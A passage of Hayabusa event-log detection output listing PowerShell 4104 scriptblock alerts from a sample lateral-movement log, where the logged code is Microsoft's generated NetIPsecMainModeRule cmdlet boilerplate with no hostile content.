$false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 